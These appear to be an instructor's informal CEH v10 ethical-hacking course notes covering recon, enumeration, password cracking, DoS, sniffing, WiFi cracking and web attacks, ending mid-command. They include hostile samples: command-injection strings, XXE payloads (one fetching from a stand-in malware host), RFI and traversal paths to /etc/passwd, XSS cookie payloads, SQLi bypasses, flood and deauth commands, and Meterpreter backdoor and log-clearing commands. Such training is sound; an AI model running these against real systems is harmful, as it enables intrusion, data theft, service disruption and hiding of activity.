Ec-Council

CEH v10
Certified Ethical Hacker v10
Level: Beginner
Certification which teaches you about basics of various security domains.
20 Modules. 40 Hours.
Aim: Knowledge
Validity : 3Years

ECSA
Ec-Council certified Security Analyst v10
Level : Intermediate
Penetration Testing.
Aim: Skill
Validity : 3Years

LPT-Master
Licensed Penetration Tester
Level : Advance
Aim : Proficient
Validity : 2Years

What CEH is not.

Penetration Testing
Vulnerability Assessment // it teaches VA but not specific into it.
Security in Defensive // Offensive

What CEH actually is.

Beginner level Training which tells you basics of 10 diff security domains.
Teaches you what a attack / breach is, how it is done and why is it possible.

CEH v10
20 Modules

First Six modules tells you about basics of security.

3,4 which dont have lab,

125 MCQ(Multiple Choice Questions) 4hours 70%, 87~

/////
My Way of Teaching.

Strictly No PPt's
Start Basics of Security.
More Lab
Notepad // for defination and basic understanding
MS Paint / Google Drawing, // understanding the flow
Ec-Council's Ilabs, Courseware.
My Own lab Setup.

////////
Access Code : Will be shared to you from your Co-Ordinator
Note: Your Access code will take nearly 1 week to be generated

Aspen Portal URL : https://aspen.eccouncil.org/

// To Download your Courseware, and Certificates.
Validity : 1 Year
Ilabs URL: https://eccouncil.learnondemand.net/
 // To Access your Ilabs
Validity : 6Months

Pre Req:
Basic understanding of Network
IP, DNS, ARP, TCP, UDP, Ports,
Book: https://ontibaanaadi.blogspot.com/p/hacking-books.html

//////
Module 1

What is Hacking ....?

Accessing a protected resource with an authentication / authorization is known as

hacking.

Pillars of Security

Confidentiality (encryption)// data should not be visible to

unauthorized people
Integrity (Hashing)// data should not be tampered
Availability (Backups, Proper security mechanisms)// due to
security issues, data transmission should not be interrupted.
Ex:DOS
Authenticity (1, 2 authentication)// should not be able to access
anything unless aunthenticated.
Non-Repudation (Logs)// user cannot deny his activity, every major
activity should be logged.

Types Of Hackers///

Black Hat : hacker trying to HARM

White Hat : hacker trying to Protect
Pentester, Security Analyst
Gray Hat : hacker trying to do both.

Script Kiddies: just work on tool, with no knowledge on hacking.

/////////

5 Phases of Hacking.

1. Information Gathering //Collecting As much as info about

your target.70% of your time
//Nmap, Mass Scan
2. Exploitation / Gaining Access // getting a low privileged
access.
//Core impact - Metasploit
3. Privilege Escalation // Elevating your access from lower
privileges to higher privileges Guest-Admin
// meterpreter script for
post/multi/recon/local_exploit_suggestor
4. Creating Backdoor / Maintaining Access

5. Clearing Footprints / Clearing logs / Covering Tracks

Pre Exploitation / Information Gathering / Reconnaissance

Exploitation
Post Exploitation

Robber => Hacker

Money => Data

Bank => Computer / Server

Windows
Guest -> Standard User -> Admin -> NT Authority

Unix
Guest -> User -> Sudo User* -> Root
////////////////////////////////

Few Terminologies

Vulnerability : a loop hole or weakness which exists on a computer, any device,

protocol, scripts, program etc.
Ex: glass door
Exploit : its an attack or breach done utilizing a vulnerability
Ex: entering into to the Bank
Payload : a script or tool which is used to exploit
Ex: Hammer, stone

Bot : is a backdoor setup by a hacker on a previously compromised machine.

Doxing: publishing privately identified info (usually found by hacking) into social
networks, or internet.

Daisy Chaining: A->B->C->

Zero Day Attack / vulnerability:

Paid Game: 27:08:2019 Officially Released

28:08:2019 Someone Found A Vulnerability

29:08:2019 Reported a vulnerability

03:09:2019 Released Official Patch

Zero Day vulnerability : A vulnerability existing until a official Patch is

released
/////

Eternal Blue, Shadow Brokers, Wannacry Ransome ware

March 14, official patch

May attack.
////////////////////////////////////////
I-labs Limitations:
I-labs is a isolated network, which does not have a internet connectivity.
You can never take any file into the i-labs from your computer nor the vise
versa.
you could only work with the tools and scenarios present in the i-labs.
Server 2016 (Tools directory)

Server 2012 (Attacker Machine)

Windows 10 (Victim Machine) & (Attacker Machine)
Windows 8 (Victim Machine)

Kali Linux (Attacker Machine)

Ubuntu

Build Up your Own Practice Lab:

https://www.hackwithbkob.com/2017/04/your-not-alone-we-are-watching-you.html

//////

Module - 02

Information Gathering
-> Passive IG M2
-> Active IG M3,M4,M5

Agenda 08-09-2019
Passive IG
Active IG

Exploitation

-> Passive IG M2 / Usually Web based Targets, For Social Engineering

Attacks.

Most Common Targets: Websites, Devices Accessible through Internet

Note: Ilabs is not used for this Module

Ipaddress
Web technologies used
Physical Address info (Not MAC Address)
Technologies used internally through Job portals
Whois //https://centralops.net/co/
History of web pages
DNS info //https://centralops.net/co/
Subdomains
Hidden files, etc.

Please install Addons: Netcraft, Wappalyzer, Cookie Quick Manager.

A small testing website:

http://certifiedhacker.com/
http://testfire.net
http://test.vulnweb.com/
https://www.hackwithbkob.com/

Use google's search enginer to help you hack someone

Google Dorks
GHDB Google Hacking Database
site: // restrict the search queries to a given domain
intitle: //would only show you website's title consisting of the given text.
intext: // give you all the websites which contains the given text in
there web pages
inurl: // give you all the websites which contains the given text in
there url

filetype: ,etc

always use '-' to negate the given text

wipro.com , www.wipro.com

https://www.exploit-db.com/ //Bundle for exploits and hacking scripts

httrack

Shodan.io // used to find online IOT devices

Active Information Gathering

Scanning // Port Scanning

Enumeration // Gathering services leaking information
Vulnerability Scanning // how to identify vulnerabilities of the machine.

// Scanning //Port Scan

Logical Ports // Non Physcial Port used to communicate with another computer.

ports used to connect your computer with other computer for a network activity
65535 Ports
Sockets => IP:Port
127.0.0.1:8080 => traffic

Protocols =>

TCP(Transmission Control Protocol) & UDP (User Datagram Protocol)

SYN // Synchronization this flag is used to initiate the connection

ACK // Acknowledgement used to acknowledge that data is received
RST // Reset used to reset the connection.
FIN // Finish used to initiate the end of the communication
URG // Urgent used to specify the priority of the data during transmission.
PSH // Push used to specify the priority of the data to be processed by the CPU.

https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers

1-1023 Well known / Reserved Ports //few ports standardized for specific
services
Ex: HTTP-80,FTP-21,SSH-22,SMTP-25,SMB-445,SNMP-161

1024 - 49151 Vendor Specific Ports / Registered Ports

Microsoft 3389 RDP, Mysql 3306, Postgresql 5432.

49152 - 65535 Dynamic Ports

192.168.1.1/24

/24
192.168.1.1 - 192.168.1.254
/16
192.168.1.1 - 192.168.254.254
/8
192.1.1.1 - 192.254.254.254

Practical Ports Scanning

Identify whether target machine is up or not
identify Open Ports
identify Services running on those open ports
identify O.S running
identify Vulnerabilities * // not traditionally used in port scanner

nmap is the well knowned and most commonly used port scanner

Ec-Council's ilabs Setup

windows 8 10.10.10.8 victim sometimes

windows 10 10.10.10.10
windows 2016 10.10.10.16 www.goodshopping.com / www.moviescope.com
windows 2012 10.10.10.12
Kali Linux(2018 updated) 10.10.10.11 Attacker Machine
Ubuntu 10.10.10.9

Android machine :it is not connected.

////////////////////////

My Labs Setup

Updated Kali Linux Attacker Machine

Windows 7 Victim

Some Vulnerable Linux Machine *

//
Pre Req, For Building your own Lab
i3 or i5 Processor
500(free) GB HDD,
8GB of RAM
Network Connection (Wifi or Ethernet Router)

https://www.hackwithbkob.com/2017/04/your-not-alone-we-are-watching-you.html
Kali Linux Creds => User : root , Pass : toor
//

Agenda
// Practical of Port Scanning

Cheat Sheet for linux Commands

https://www.hackwithbkob.com/2018/03/basic-linux-commands.html

Cheatsheet for Nmap commands

https://www.hackwithbkob.com/2018/04/nmap-cheatsheets.html

OS's For Hacker's

Kali Linux
Parrot Sec
Black Arch
Backbox
Samurai
/////////////////////////

live website to perform Port Scanning

http://scanme.nmap.org/
any machine on your network
192.168.1.1-192.168.1.254

Assignments:...?
perform port Scanning on
windows 2012,
windows 8
kali linux
ubuntu

1.what ports are open

2.what are the services running on those machine.

Agenda For 15-09-2019

4. Enumeration
5. Vulnerability Scanning
6. System Hacking
// Enumeration
will probe the open port to get more info about target.

445 (SMB) Server Message Block, shares, username, accuracte o.s version
161,162 (SNMP)Simple Network Management Protocol system info, programs
installed, Usernames, network info,

139(TCP),137(UDP) system name

//

smbclient // this would list and help you to view publicly shared files without
authentication.

=> smbclient // is tool to probe smb port and get info

=> smbclient -L <target-ip> -N // will list all shares enabled in the machine
=> enum4linux -a <target-ip> // perform detailed enumeration on target machine

=> nmap -p 445 <target-ip> --script=smb* // will execute all smb based scripts on
target
=> nmap -p 445 <target-ip> --script=smb-enum-*
=> nmap -p 445 <target-ip> --script=smb-vuln-*

=> nbtscan -r <ip-range> // to get system's name of the entire network range

=> netdiscover

=> locate .nse | grep <service name>

Vulnerability Scanning:/

lookout for loopholes or vulnerabilities on your target.

1.RCE (Remote Code Execution)//any thing but should write code for it. 1,2,3
may look similar
2.Command Execution. //only executes command allowed by the o.s for the designated
user
3.Arbitrary Code Execution // allowed to execute few code on the target machine.
4.DOS (Denial Of Service)
5.Backdoor
6.Information disclosure (85%)

in RCE attacker will be able to execute any code on the victim machine without
authentication remotely.

vulnerability codes

CVE(Common Vulnerability & Exposures):**

CWE(Common Weakeness Enuermation): sans
MS(Microsoft): its own products vendor
OSVDB(Open Source Vulnerability Database)
NVD(National Vulnerability Database)

CVE 2014-6471 shell shock, CVE 2017-0143 eternal blue. ms17-010

Infrastructure / web

Nessus (Trial)* Burp suite

Qualys Guard App spider
Acunetix IBM Appscan
Nexpose Acunetix
OpenVAS = FREE OWASP-ZAP

Exploitation:
Metasploit Community free / paid
Core Impact Paid
Canvas Paid

After a vulnerability is reported:

Fixing can be done.

Fixing cannot be done

true positives rightly vulnerability exists

true negatives rightly vulnerability doesnot exists
false negatives wrongly the vulnerability doesnot exists
false positives. wrongly the vulnerability exists

https://10.10.10.16:8834/ ilabs/
nessus creds: admin / password

MS17-010 / CVE 2017-0143 Eternal Blue

Black Box // no info about target, No Creds

White Box // All info about target, All creds including Admin and User
Gray Box // Partial info about target, Creds of low priv User

/////
6.System Hacking
1. Getting Access through Cracking System's Passwords
2. Getting Access through a RCE Vulnerability (MS17-010, CVE 2017-0143)
3. Getting Access through a Malware and a bit Social Engineering
Hash is an Cryptographical Method, which translates given data into a unique text
of a specific charset and length.
1. Same hash value for a same data, irrespective of where ever the data is
calculated.
2. Hashes can never be Reversed.

windows 7 computer in dubai

hello -> 12345tyu

Linux machine in china

hello -> 12345tyu

/////////////////
Practical Types of Password Cracking

wordlists / Dictionary file // is a text file consisting of possible passwords

#Dictionary Method Password Cracking // list of possible passwords are feeded

to the tool, the probablity of password depends on the wordlist.

#Bruteforce //try various combination of password,

Ex: password might be 8digit length, consisting of lower alphabets
aaaaaaaa-zzzzzzzz password

#Rainbow cracking / Rainbow table Cracking

Construct a table with a list of possible password and there respective hashes. and
then its fed to a tool.

//
1. Copy the hashes to your attacker machine //Admin
2. Crack it the respective hash cracker/ password cracker tool.

//Every Hacking Activity Would be Having a "dependency" and "limitations".

// Konboot // cd image, which allows you to login without Password.

// Windows Password Recovery Disk //

P@$$w0rd

WINDOWS
Location: C:\windows\system32\SAM
Algorithm: NTLM

Unix:
Location: /etc/shadow
Algorithm: Sha,md5

Tools to Crack windows Password

=> pwdump //used to dump password hashes
=> ophcrack // used to crack password hashes
=> winrtgen // used to generate rainbow tables for given boundary
=> rcrack // used to crack password hashes using pre computed rainbow tables..

A(1) hello 2345678-> 23456781

B(2) hello hxv jhc-> 23456782

Tools to Crack Linux Passwords

=> unshadow
=> john
Windows:-
user1: password = 1234567890
user2: password = 1234567890

Linux:
user1: password + 35 (password35) = flvdlxbbduf
user2: password + ab (passwordab) = cdskbdbcbvu

Appending a random character with the user's provided password and calculating the
hash is known as Password Salting random character is known as passsword salt

User's info is stored /etc/passwd //readable to all users, writeable only to root
User's Password Hash /etc/shadow // read writeable only by root

Steps:
1. Copy both Passwd and Shadow file
2. Combine both passwd and shadow in the correct order
3. Run a password cracker with suitable method to crack the password.
///////////////

Offensive = Red Team

Defensive = Blue Team

2. Getting Access through a RCE Vulnerability (MS17-010, CVE 2017-0143)

3. Getting Access through a Malware and a bit Social Engineering

1. Create a Payload
2. Create a Listener
3. Transfer the payload to Victim and make him execute the payload using social
Engineering.

Sept-22 Agenda
Creating Backdoor.
Malware
Startup Location = C:\Users\<username>AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\

Creating a Backup User

//Command to create admin user in Meterpreter
run getgui -u <username> -p <password>
//command to start remote desktop connection from kali linux
rdesktop <victim_IP> -u <username> -p <password>

Clearing Footprints
Clearing User logs and over all system's logs

//Command to clear logs using meterpreter

clearev

//////////////////////////
Malware Threats

Is an application which causes harm to the computer

!!! A malware will never cause harm unless it is executed. // alive Bomb

Trojan Horse Malware -> Legitimate Application. = Resulting App

(Troy Story) Msfvenom -> Team viewer = Team Viewer

VIRUS (Vital Information Resource Under Seige)

Worms that spreads its existance,
Spyware spy's the user, Camera, Mic, Key strokes etc
adware pops out ads, and miss lead the user towards other malware.
Ransomeware the hacker takes over the data and ask for ransomeware
Rootkit a malware which hides from any antivirus or monitoring tool
RAT Remote access Trojan

Veil Evasion used to encrypt malware,

Wannacry Ransomeware, Petya , non-petya = 2017

/////////////////
Malware Analysis

Static Analysis, dissassemble the code, ollydug, immunity debugger.

Dynamic Anaysis. run the malware in an controlled environment and then observer
the changes it makes on the computer
tools:process hackers,tcp view, wireshark,

////////////////////////////
Social Engineering. A low-tech way of Hacking

its a methodology / art of hacking someone not through computer's vulnerability but
through human vulnerabilty, through convincing people to do your stuff.

Phishing //fake webpage which will look identical to original

Vishing fraudlent calls, Bank,financial oragani, ATM, cvv, otp
Smishing fraudlent SMS, Bank,financial oragani, ATM, cvv, otp
Tailgating

Art of Exploitation -> Kevin Metnick

Kevin Metnick => Youtube
////////////////////////////////

Denial Of Course

DOS Denial Of Service:

Its an Attack where hacker freezes / makes the target computer inaccessible to the
Legitimate user through DOS vulnerability or through flooding with malicious
packets

From DOS attack, attacker does not get any data of the target,
DOS is done to create a financial or reputational Loss for target company.

Connections per instance

sockets

1 Client Server has to invest 3 sec

server can handle 500 user at given time

there are 1000 request from the client,

503 Service Unavailable

DOS Denial Of Service // 1 attacker to 1 server

DDOS Distributed Denial Of Service //Multiple attacker to 1 server

DOS Denial Of Service - A

1 x 1

attacker{more } = server{less}
15mbps 10mbps

xyz => server 10gbps

DDOS => Distributed Denial Of Service
Many x 1
100000 x10mbps = 10gbps Mirai.
/////////////////////////////
Making CPU busy in a process for longer period.

Volume Based

Ping of death // by increase the size of packet sent in ping

Command => ping <target-ip> -s <size of the packet>
-l in windows

//ICMP can be blocked on the servers

Protocol Based
Syn flood // by continously sending only syn request to the open port

Command => hping3 -S -p <port number> <target-ip> --flood

/////

Some Common ways to Defend Against DOS attacks

1. Keep all your machines, patched uptodate.
2. Sensing the traffic & blacklisting
3. Load Balancer
4. Content Distributed Network
5. Black hole

Time To Live // specifies the age of that specific packet

HOIC, LOIC // perfrom DOS on websites.

////////////////////////////////////
Sniffing
where attacker will be able to get/find/identify what data was exchanged
between two neighbouring computers of the same network.
LAN Network Layer 2

192.168.1.10
192.168.1.
A & B

Limitations;
It is only possible on LAN
It is only possible on PLain text protocol
Passive Sniffing<HUB> // attacker is idle watchs the traffic flowing
Active Sniffing<Switch> // attackers reroutes the path between two victim through
the attacker. Also known as Man in the Middle attack, (MITM)

Promiscous Mode.

ARP Address Resolution Protocol // ARP thinks latest info is the

rightfull info
IP to Mac

ARP Posioning // sending faek ARP packets to the victim

IP forwarding // transferring data from A to D

DNS
Domain name to IP address.

ARP Cache temproraily stores, mac and ip table of the devices it has
found

ARP belives in Latest info is the truthfull info

>> arp -a // arp cache of your device

Not Possible
Mobile Hotspot gateway
kali linux attacker

Possible:
Mobile Hotspot gateway
kali linux attacker
windows7 victim

wifi router gateway

Mobile client
Kali linux attacker

MITM
ARP Poisioning
IP forwarding

Limitations
only works in LAN
Can only view Plaintext Protocol

Plaintext Encrypted
HTTP HTTPS
FTP FTPS
Telnet SSH

Attacker Kali Linux 10.10.10.11

Victim 1 Windows 10 10.10.10.10
Victim 2 www.moviescope.com/10.10.10.16

Tools:
Ettercap // To Perform ARP Poisioning & IP Forwarding
Wireshark // To view the packets

Wireshark Cheatsheet:
https://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
//////////

Session Hijacking
HTTP (Hyper Text Transfer Protocol)
Stateless Protocol
=> Cookies -> temprorary stored medium at the client end, which is
created/assinged from the server end

Session ID // unique ID assinged for an authenticated user to authorize and track

his activity.

Broken Authentication or Improper Session Management

Cookies :-
Rules of Secure Cookie Management:
// Cookie should be expired as soon as the user logs out
// A cookie assigned to person should not be assinged to any other
/ a cookie once used should be disposed and not reused again
// Cookie value should be Random and should not contain any information about user
and creds

Flags of Cookie:
HTTP only // cookies are transfered only via http (cannot steal cookies via xss)
Secure // cookies are transfered on https.

Burpsuite Link: https://portswigger.net/burp

Proxy:
1 : Hide your identity(Anonymizer)
2 : Bypass your restriction (Torrent)

HTTPS Sniffing:
A:(VICTIM)Sender : browser(Firefox)
B:Proxy Server : Burpsuite
D:website : Server

Burpsuite:https://portswigger.net/burp/communitydownload

Convince the victim to make attacker machine as proxy and add the certificate as
trusted root Authority

Port forwarding // WAN,MAN

addon:- Cookie Editor

https://addons.mozilla.org/en-US/firefox/addon/cookie-quick-manager/

Web server and Application

Acunetix
Creds: test-test
Testing Link:http://test.vulnweb.com/login.php
Profile Page:http://test.vulnweb.com/userinfo.php

IBM
testing Link: http://testfire.net/
Creds: admin-admin
jsmith-Demo1234
Session Fixation Attack:- Attacker would assign a random / specified value to
cookie and the web app accepts

Session Replay Attack:- Attacker uses an expired cookie / cookie after logout and
the web app allows it.

Mobile-*
IOT
WIFI*
Cloud Computing
Cryptography

///////////////////////////////

Mobile Phone Smart Phone

its a Palm Top Computer,
: Port Scan
: Vulnerability Scan(Nessus)
: Metasploit/Core-Impact

Android ( Open-Source owned by Google) / IOS(Apple) unix Flavoured OS.

1.Each App in your phone is actually considere as a specific user

/home/<username>
Privilege Escalation
Android: Rooting
IOS: Jail Breaking
Guest Emergency keypad, camera
User Almost App
Sudo Manufacturer,
Super User(root) Playstore,

Change the payload:

1. windows/meterpreter/reverse_tcp =>
android/meterpreter/reverse_tcp

2. --platform android

3. exe => apk

Android Simulator: Genymotion

Create Payload
Create Listener
Send the payload to victim and convince him to install

abd drivers // execute commands on phone through computer

SPF:https://bulbsecurity.com/products/smartphone-pentest-framework/

owasp top 10 mobile:

https://www.owasp.org/index.php/Mobile_Top_10_2016-Top_10

ABD Drivers
http://adbdriver.com/downloads/

///
IOT (Internet Of Things)
Its an ability to connect a particular device to internet

(Heater, Gates, Camera, Microwave oven, Bulbs, house Controlling, Alexa, Medical
Sensor, Pace Makers)

https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project

///////////
Wifi (Wireless Fedility) IEEE 802.11
Wifi Access point, Wifi Router, almost similar to switch

2.4Ghz(low-Range, personal, small scale office),

5 Ghz(high-range, high scale wifi connection, Ex: google wire)
a,b,g,n(Ranges, speed)
Bssid : Mac address wifi AP
ESSID : Wifi Name
channels:13 total 11 allowed in indian Region
Password Enc: open, WEP, WPA, WPA2
WEP = Wired Equivalent Privacy (encoded) 2007year 25k decode the password
WPA/WPA2 = Wifi Protected Access(hashed).

Wifi Works:-
1. Access Point would broadcast his info to his feasible range
2. When client enters access points feasible range then he would get AP's
information
3. Client would iniate connection to the AP along with the creds in the specified
method shared in Broadcasted info
4. AP would validate the creds, and give access to client if creds are correct.

Step to Hack wifi

1. Turn your wifi adapter into Monitor Mode.

//athreos chipset Ex; TPlink 722nv1, 822n v2, Alpha

2. search the nearby wifi signals

3. select one of your target, and start sniffing on the targets channel and saving
the received data into a file.

WEP: 4. after collecting 25k packets, crack the password

WPA/WPA2: 4. wait until you receive password handshake.

5. use bruteforce or dictionary to crack the wifi password.

6. Turn your wifi adapter back to Managed Mode.

Dependencies : External wifi adapter, with Atheros chipset

: interms of WPA need a dictionary file
: Require atleast 1 client connected to the wifi AP
: Kali linux should be running as a host OS, Live OS
=> iwconfig // to check the status of wireless adapter
=> airmon-ng start <device-name> // turn on moniter mode
=> airodump-ng <device-name> // to get info of nearby wifi AP's
=> airodump-ng --bssid <mac addr of wifi AP> -c <channel number> --write <filename
to be written as> <device name> //to sniff and save the sniffed file
=> aireplay -0 <number of packets> -a <bssid> -c <clients mac address> <device
name> // to disconnect the client from target AP

=> aircrack -w <wordlists path> <sniffed file>-01.cap // to crack wpa of wpa2

password

Best Tool : Aircrack-ng

////////////////////////////////
Hacking Webservers

Web Server Hacking

Server is a computer which serves the client's request.

Available 24x7
Rigid, Redudant system.

Windows xp ~ Windows Server 2003

Windows 7 ~ Windows Server 2008
Windows 8 ~ Windows Server 2012
Windows 10 ~ Windows Server 2016

FTP
Enumeration (nmap, netcat)
FTP Password Cracking
Target: 10.10.10.16 (Server 2016)
Attacker: 10.10.10.11 (Kali Linux)

Web
What is Web.
Basics of HTTP
Enumeration(nmap,dirb,Nikto)
Password Cracking

Web Server Basics:

html,php, java, asp, dot net
webroot, Host Location // the location of the root directory where the webpages
are located

https://en.wikipedia.org/wiki/Static_web_page
https://en.wikipedia.org/wiki/Dynamic_web_page

C:\webroot\www\ , C:\Inetpub\www\bank/main.jsp

/var/www/, /var/www/html/bank/main.jsp

Apache,ngix,IIS

Web 1.0(Static)Single Tier Arch | // 1999

Web 2.0(Dynamic) Multi Tier(3tier) Arch // As of today
How web works
HTTP Request
HTTP Response
URL

Unique Resource Locator

Unique Resource Indicator

http://yoursite.com/ folder1/folder2/index.php?userid=1
| Server Details |~~~ URI ~~~|

http:// | yoursite.com | /folder1/folder2/ | "index.php?userid"=1

protocol | your actual website's domain | folders | file which is requested | query
parameter

Parameter operators : ?, #, %,

http request: Request made from the browser to the Web Server.

{HTTP method} {path of the file} {HTTP version}

Host: {address of the web server}
User-Agent: {user client information}
{accepted Parameters}
{request body / parameters} //cookie, cookie_name: cookie_value

https://www.tutorialspoint.com/http/http_requests.htm
/////
http response:

{http version} {response code}

{server info}
{content info}
set-cookie: cookie_name:cookie_value, domain: / , expiry: , flags
connection:
keep-alive
closed

{response code}

https://www.tutorialspoint.com/http/http_responses.htm

httpd.conf // contains the restrictions of the web server

HTTP Methods // To indicate the server the type of request been made

GET => clients wants to get data from the server

HEAD => gets the response header of the requested site.
POST => clients wants to send data to the server
PUT => insert / add a resource on the webserver
PATCH=> edit an existing resource on the webserver
DELETE=> delete the resource on the webserver
TRACE=> used to track the clients path to server's local location
OPTIONS=> used to identify the view all the permiseable HTTP methods

HTTP respones code //To indicate the browser / http client the type of Response
been given

1XX 100-199 Information 100 ok

2XX 200-299 Successfully processed 200 ok
3XX 300-399 Redirection 302 unconditional, 301 conditional redirection, 304
not modified.
4XX 400-499 Client side Error 400 bad request, 403 forbidden, 404 not found
5XX 500-599 Server Side Error DOS 502/503.

burpsuite, IBM appscan, Webscarab, owasp-zap, mitm proxy.

Hacking Webserver:
CMS Content Management System: wordpress, joomla, drupal, etc
CPanel.
PUT,

php,asp,java

Lab:
1. directory bruteforce / spidering.
2. Scanning website configuration.
3. online password cracking
http login

Assingment:
crack ftp password for the windows server 2016.

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-
Credentials/best110.txt
////////////////////////////
Today Agenda 6-10-2019

3 Tier Architecture / Web Application Works (D)

OWASP TOP 10 2017 (Revised 2018)
Exploiting Web application

Attacker : 192.168.43.26 (Kali Linux)

Victim : 192.168.43.2 (DVWA)

Command Injection
SQLi
1. Bypassing Authentication
2. Steal / dump data stored in the Database

XSS

Bypassing Auth

Index.php
Displaying all you directories and sub directories

use a xml file as a reference

in that xml you will mention the directory to be displayed
xml // user files

/home/bkob/Desktop/user_files

/etc/passwd
/etc/shadow

Authentication: validate whether you are whom your portrating as.

Authorization: Defines what all an authenticated user can do.
Paid video Streaming (Netflix, Amazon Prime Video)

For all Non Paid Users

cookie: Status=Not Paid

For All Paid Users

cookie: Status=Paid
//////////////////
Seralization and Deseralization

execute()
a = b+c
d = a+x
e = d*5

execute = a=b+c;cat%20/etc/passwd;d=a+x;e=d*5;

5
display the contents of passwd file
7
35

Client Side Attacks // Impact is on the user end

ex:XSS,CSRF,Session Hijacking
Server Side Attacks // Impact is on the server end ex:SQL injection,LFI,RFI,
etc.

OWASP top 10 2017 R2

https://www.owasp.org/index.php/Main_Page
https://www.owasp.org/index.php/Top_10-2017_Top_10

Web Application Hacking

Client Side Attacks // Impact is on the user end ex:XSS,CSRF,Session Hijacking

Server Side Attacks // Impact is on the server end ex:SQL injection,LFI,RFI,
etc.

OWASP top 10 2017 R2

https://www.owasp.org/index.php/Main_Page
https://www.owasp.org/index.php/Top_10-2017_Top_10
////
FE:
[<Enter the IP to Ping>]
{ping}
ip = 8.8.8.8 && whoami
BE:

ip=$ip // ip = 8.8.8.8 && whoami

ping -n 3 %ip => ping -n 3 8.8.8.8 && whoami.

Session Fixation attack // attacker is able to fix/assume a session id and the

application accepts and consider him as a logged in user.

Session Replay attack // attacker tries the previously assigned cookie/ session
id and if the application accepts and consider him as a logged in user.

Check Lists of Session id's

% cookies/session id should only be transfereed via https only //http only secure
% Each cookies/session id should be disposed as soon as a user logs out
% cookies/session id should never be re used
% cookies/session id should be a random data, it should not contain any information
about the user
//////
Internal Directory
<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/config.php" >]>
<foo>&xxe;</foo>

External Devices directory

<!ENTITY xxe SYSTEM "https://malicoussite.com/malware" >]>
///////////////////

Low Privielged User

high Privielged User

Access identifiers = request parameter, cookie, header

///

Paid / Free

Cookie: paid=true

Cookie: paid=false

Authentication & Authorization

valid user or not & user holds these privileges or not
unique cookie.
/////////////////////////////

Security Misconfiguration:
PUT, PATCH, DELETE, default admin credentials, restricting inclusion, uploading few
file types like php, jsp, asp, exe, including robots.txt.

/////////////////////////////

<html>
<head>
Headers should be present here
</head>
<body>
Body text and data should be present here
</body>
</html>

Client Side Attack

XSS is a type of attack, attacker is allowed to inject/alter a data in the html
source code of the user.

<h1>hello</h1>
alert 1 on the page <script>alert(document.URL)</script>
redirecting <script>window.location="https://google.com"</script>
get cookies <script>alert(document.cookie)</script>

no input validation

Reflected XSS/ Non Persistent XSS // code injected is temprorary, impact is only
on the given link, does not stored in db
Ex: Search box, View, any input which is echoed by server and the text is
temprorary
Stored XSS / Persistent XSS // code injected is permanent, impact is all
the users accessing the vulnerable webpage, does stored in db
Ex: messages, chat, comment, address, any input which is been stored in DB

XSS : https://xss-game.appspot.com/level1
XSS : http://leettime.net/xsslab1/
username
credit card

Name Role Password

Bharath student Text123
Bharath Admin Text123
/////////

CSRF:Cross Site Request forgery :test.vulnweb.com

Directory Traversal:
hello CEH LAB

C:\webroot\www\..\..\..\boot.ini //you get the file

/var/www/../../../etc/passwd // you get the passwd file

directory traversal, the attacke would be able to access a server's internal files
//Read the file

http://testfire.net/bank/main.jsp
/var/www/html/bank/../../../../etc/passwd

used to get creds, config file of a web server

FI:
Local File Inclusion, Remote File Inclusion

in certain webpages, additional code will be executed inside a particular file

ALU (Addition, Substraction,Multiplication,Division)

Alu.php
sum.php //addition&Subs

ALU.php?file=../../../etc/passwd
ALU.php?file=prod.php
hosting file = Alu.php
Executing File= sum.php

Local file inclusion/

view and execute all the files of the located on the server
Remote File inclusion

Game.com/game=http://www.race.com/race.php
Game.com/game=http://EAsports.com/cricket.php
Game.com/game=http://soccer.com/football.php
Game.com/game=http://malicious.site/malware.php

RFI is an attack, where attacker could make a malware(web) to execute on the

webserver.
////
CSRF: Client Side request Forgery
Attacker will make a victim to execute Authenticated web request, with victim's
access level, without his knowledge
GET
POST
1: attacker creates a malicious script
2: attacker masks the malicious script with some attractive info and sends it to
victim
3: Victim visits the fake web page, and click/submit the link

///
SQL injection:
Bypassing Authentication

File-> Sheets-> Rows x Columns

Database_Name -> Tables -> Columns & Rows

Sample Query:

select * from Table_name where Column1= " " && Column2= " "

sample query for Authentication

uname= test
pass= test

select * from users where username= "%uname" && Password= "%pass"

select * from users where username= "test" && Password= "test "
true && true = true

select * from users where username= "admin" && Password= "pass"

true && false = false

1'or'1'= '1

select * from users where

username= '1' | or | '1'= '1' && Password= '1' | or | '1'= '1'

(false or true) && (false or true)

true && true = true

 Steal data with sql injection
Manually

select * from users where Userid = ' 3';

www.travelindia.com/placestovisit=%id

select * from tourist where id = '%id'

select * from products where id = '43'

Ways to find sql injection vuln

1. Web Application scanner
2. Burpsuite scanner (pro)30k
3. sqlmap
4. google dorks

Types of SQL injection

Error based we retrive the data through error

Union based =>we run an existing query along with the user defined
query to retrive the data.
=>each query depends upon the data resulted in previous
query
Blind sql //
1. boolean based true or false
2. time based delay or no delay

Methodology to Perform SQL injection (Manual)

1. use ' or " or \ to check is it vulnerable or not.

2. identify how many columns that query is satisfing using (order by operator)
3. use union method to try to get data of the site. and echo back data from the DB

id = 43'
select * from products where id = '| 43' select * |'
comment out the right side of the query
LHS| | RHS

select * from products where id = '43' the query would be consisting of 10

columns --+'

number of columns specified is >= given number we dont get an error

number of columns specified is < given number we get an error

there are 15 columns in the query

google dorks to identify sql vulnerable websites

https://gbhackers.com/latest-google-sql-dorks/

Practice Manual Sql injection

http://leettime.net/sqlninja.com/ practice
http://securityidiots.com/Web-Pentest/SQL-Injection training

Sqlmap github link: https://github.com/sqlmapproject/sqlmap

Sqlmap Commands cheatsheet: https://www.hackwithbkob.com/2018/05/sqlmap-
cheatsheet.html
http://www.sandex.pk/about.php?id=p

///////////////////////////////////////////////
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/SQLi/Generic-
SQLi.txt

sqlmap -> sql injection

<script>alert(document.cookie)</script>
<script>window.location='https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en
%29.pdf.pdf'</script>
///

<script>alert(document.cookie)</script>

security=low; PHPSESSID=2d6fa9c1c72a3f140bfa413e966fea4b

sqlmap --cookie="security=low; PHPSESSID=2d6fa9c1c72a3f140bfa413e966fea4b" -u

